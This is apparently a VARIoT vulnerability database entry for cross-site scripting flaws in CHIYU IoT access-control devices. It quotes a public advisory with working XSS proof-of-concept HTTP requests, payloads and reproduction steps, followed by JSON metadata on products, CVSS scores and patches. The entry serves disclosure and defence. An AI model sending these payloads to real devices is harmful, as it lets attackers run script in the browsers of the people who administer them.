var-202106-1313
Vulnerability from variot
An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter. An attacker can use this vulnerability to execute client code. # Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
Date: May 31 2021
Exploit Author: sirpedrotavares
Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
Software Link: https://www.chiyu-tech.com/category-hardware.html
Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
CVE ID: CVE-2021-31250 CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
============= PoC 01 =============== Affected parameter: TF_submask Component: if.cgi Payload: ">alert(123)
HTTP Request: GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/ap_tcps.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_submask) 4. Submit the request and observe payload execution
============= PoC 02 =============== Affected parameter: TF_hostname=Component: dhcpc.cgi Payload: /"> HTTP request and response:
HTTP Request: GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/wan_dc.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (dhcpc.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_hostname) 4. Submit the request and observe payload execution
============= PoC 03 =============== Affected parameter: TF_servicename=Component: ppp.cgi Payload: ">alert(123)
GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1 Host: 192.168.187.143 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.143/wan_pe.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (ppp.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_servicename) 4. Submit the request and observe payload execution
============= PoC 04 =============== Affected parameter: TF_port=Component: man.cgi Payload: /">
GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/manage.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (man.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_port) 4. Submit the request and observe payload execution
2: Unauthenticated XSS in several CHIYU IoT devices
CVE ID: CVE-2021-31641 Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641
Component: any argument passed via URL that results in an HTTP-404 Payload: http://ip/alert(123)
Steps to reproduce: 1. Navigate to the webpage of the vulnerable device 2. On the web-browsers, you need to append the payload after the IP address (see payload above) 3. Submit the request and observe payload execution
3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
CVE ID: CVE-2021-31643 Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643
Affected parameter: username= Component: if.cgi Payload: ">alert(1)
HTTP request - SEMAC Web Ver7.2
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh=; remote=00000000 Upgrade-Insecure-Requests: 1
HTTP request - BIOSENSE-III-COMBO(M1)(20000)
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh= Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (username) 4. Submit the request and observe payload execution
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202106-1313",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "biosense",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "bf-631",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac d2",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac d4",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac s1 osdp",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac s3v3",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac d1",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "bf-630",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "webpass",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac s2",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac d2 n300",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac s3v3",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac d2 n300",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac s1 osdp",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac s2",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac d1",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "bf-631",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "bf-630",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac d4",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac d2",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "webpass",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "sirpedrotavares",
"sources": [
{
"db": "PACKETSTORM",
"id": "162887"
}
],
"trust": 0.1
},
"cve": "CVE-2021-31643",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2021-31643",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2021-31643",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2021-31643",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-31643",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-31643",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202106-019",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter. An attacker can use this vulnerability to execute client code. # Exploit Title: CHIYU IoT devices - \u0027Multiple\u0027 Cross-Site Scripting (XSS)\n# Date: May 31 2021\n# Exploit Author: sirpedrotavares\n# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html\n# Software Link: https://www.chiyu-tech.com/category-hardware.html\n# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions \u003c June 2021\n# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC\n# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643\n# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks\n\nDescription: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. \n\n#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices\nCVE ID: CVE-2021-31250\nCVSS: Medium \u2013 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250\n\n============= PoC 01 ===============\nAffected parameter: TF_submask\nComponent: if.cgi\nPayload: \"\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\nHTTP Request:\nGET\n/if.cgi?redirect=setting.htm\u0026failure=fail.htm\u0026type=ap_tcps_apply\u0026TF_ip=443\u0026TF_submask=0\u0026TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E\u0026radio_ping_block=0\u0026max_tcp=3\u0026B_apply=APPLY\nHTTP/1.1\nHost: 192.168.187.12\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.187.12/ap_tcps.htm\nAuthorization: Basic OmFkbWlu\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (if.cgi)\n 3. Append the payload at the end of the vulnerable parameter (TF_submask)\n 4. Submit the request and observe payload execution\n\n ============= PoC 02 ===============\nAffected parameter: TF_hostname=Component: dhcpc.cgi\nPayload: /\"\u003e\u003cimg src=\"#\"\u003e\nHTTP request and response:\n\nHTTP Request:\nGET\n/dhcpc.cgi?redirect=setting.htm\u0026failure=fail.htm\u0026type=dhcpc_apply\u0026TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22\u0026S_type=2\u0026S_baud=3\u0026S_userdefine=0\u0026AP_type=0\u0026TF_port=443\u0026TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E\u0026B_apply=APPLY\nHTTP/1.1\nHost: 192.168.187.12\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.187.12/wan_dc.htm\nAuthorization: Basic OmFkbWlu\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (dhcpc.cgi)\n 3. Append the payload at the end of the vulnerable parameter (TF_hostname)\n 4. Submit the request and observe payload execution\n\n ============= PoC 03 ===============\nAffected parameter: TF_servicename=Component: ppp.cgi\nPayload: \"\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\nGET\n/ppp.cgi?redirect=setting.htm\u0026failure=fail.htm\u0026type=ppp_apply\u0026TF_username=admin\u0026TF_password=admin\u0026TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E\u0026TF_idletime=0\u0026L_ipnego=DISABLE\u0026TF_fixip1=\u0026TF_fixip2=\u0026TF_fixip3=\u0026TF_fixip4=\u0026S_type=2\u0026S_baud=3\u0026S_userdefine=0\u0026AP_type=0\u0026TF_port=443\u0026TF_remoteip1=0.0.0.0\u0026B_apply=APPLY\nHTTP/1.1\nHost: 192.168.187.143\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.187.143/wan_pe.htm\nAuthorization: Basic OmFkbWlu\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (ppp.cgi)\n 3. Append the payload at the end of the vulnerable parameter\n(TF_servicename)\n 4. Submit the request and observe payload execution\n\n============= PoC 04 ===============\nAffected parameter: TF_port=Component: man.cgi\nPayload: /\"\u003e\u003cimg src=\"#\"\u003e\n\nGET\n/man.cgi?redirect=setting.htm\u0026failure=fail.htm\u0026type=dev_name_apply\u0026http_block=0\u0026TF_ip0=192\u0026TF_ip1=168\u0026TF_ip2=200\u0026TF_ip3=200\u0026TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E\u0026TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E\u0026B_mac_apply=APPLY\nHTTP/1.1\nHost: 192.168.187.12\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.187.12/manage.htm\nAuthorization: Basic OmFkbWlu\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (man.cgi)\n 3. Append the payload at the end of the vulnerable parameter (TF_port)\n 4. Submit the request and observe payload execution\n\n\n\n#2: Unauthenticated XSS in several CHIYU IoT devices\nCVE ID: CVE-2021-31641\nMedium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N\nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641\n\n\nComponent: any argument passed via URL that results in an HTTP-404\nPayload: http://ip/\u003cscript\u003ealert(123)\u003c/script\u003e\n\n\nSteps to reproduce:\n 1. Navigate to the webpage of the vulnerable device\n 2. On the web-browsers, you need to append the payload after the IP\naddress (see payload above)\n 3. Submit the request and observe payload execution\n\n\n#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices\nCVE ID: CVE-2021-31643\nMedium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643\n\nAffected parameter: username=\nComponent: if.cgi\nPayload: \"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n\nHTTP request - SEMAC Web Ver7.2\n\nGET\n/if.cgi?redirect=EmpRcd.htm\u0026failure=fail.htm\u0026type=user_data\u0026creg=0\u0026num=\u0026EmployeeID=0000\u0026MarkID=0000\u0026CardID=000000\u0026username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E\u0026Card_Valid=0\u0026SY=2021\u0026SM=2\u0026SD=7\u0026sy_h=16\u0026sy_m=23\u0026EY=2021\u0026EM=2\u0026ED=7\u0026sy_h=16\u0026sy_m=23\u0026Activate=5\u0026Usertype=0\u0026group_list1=1\u0026group_list2=0\u0026group_list3=0\u0026group_list4=0\u0026Verify=1\u0026Password=\u0026Retype=\u0026card=0\u0026card=0\u0026card=0\u0026card=0\u0026card=0\u0026card=116\u0026card=9\u0026card=138\nHTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)\nGecko/20100101 Firefox/87.0\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3\nAccept-Encoding: gzip, deflate\nAuthorization: Basic YWRtaW46YWRtaW4=\nConnection: close\nReferer: http://127.0.0.1/EmpRcd.htm\nCookie: fresh=; remote=00000000\nUpgrade-Insecure-Requests: 1\n\n\nHTTP request - BIOSENSE-III-COMBO(M1)(20000)\n\nGET\n/if.cgi?redirect=EmpRcd.htm\u0026failure=fail.htm\u0026type=user_data\u0026creg=0\u0026num=\u0026EmployeeID=3\u0026MarkID=3474\u0026CardID=00000000\u0026emp_id=\u0026username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E\u0026Card_Valid=0\u0026SY=2019\u0026SM=11\u0026SD=25\u0026sy_h=15\u0026sy_m=0\u0026EY=2019\u0026EM=11\u0026ED=25\u0026sy_h=15\u0026sy_m=0\u0026Activate=5\u0026Usertype=0\u0026group_list1=1\u0026group_list2=0\u0026group_list3=0\u0026group_list4=0\u0026Verify=1\u0026Password=\u0026Retype=\u0026card=0\u0026card=0\u0026card=0\u0026card=0\u0026card=118\u0026card=5\u0026card=101\u0026card=110\nHTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)\nGecko/20100101 Firefox/87.0\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3\nAccept-Encoding: gzip, deflate\nAuthorization: Basic YWRtaW46YWRtaW4=\nConnection: close\nReferer: http://127.0.0.1/EmpRcd.htm\nCookie: fresh=\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (if.cgi)\n 3. Append the payload at the end of the vulnerable parameter (username)\n 4. Submit the request and observe payload execution\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-31643"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
},
{
"db": "PACKETSTORM",
"id": "162887"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-31643",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "162887",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007491",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "PACKETSTORM",
"id": "162887"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"id": "VAR-202106-1313",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.8
},
"last_update_date": "2024-08-14T13:23:31.209000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Firmware\u00a0update",
"trust": 0.8,
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
},
{
"title": "BF-630W Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=153502"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/162887/chiyu-iot-cross-site-scripting.html"
},
{
"trust": 1.7,
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"trust": 1.6,
"url": "https://www.chiyu-tech.com/msg/message-firmware-update-87.html"
},
{
"trust": 1.6,
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31643"
},
{
"trust": 0.1,
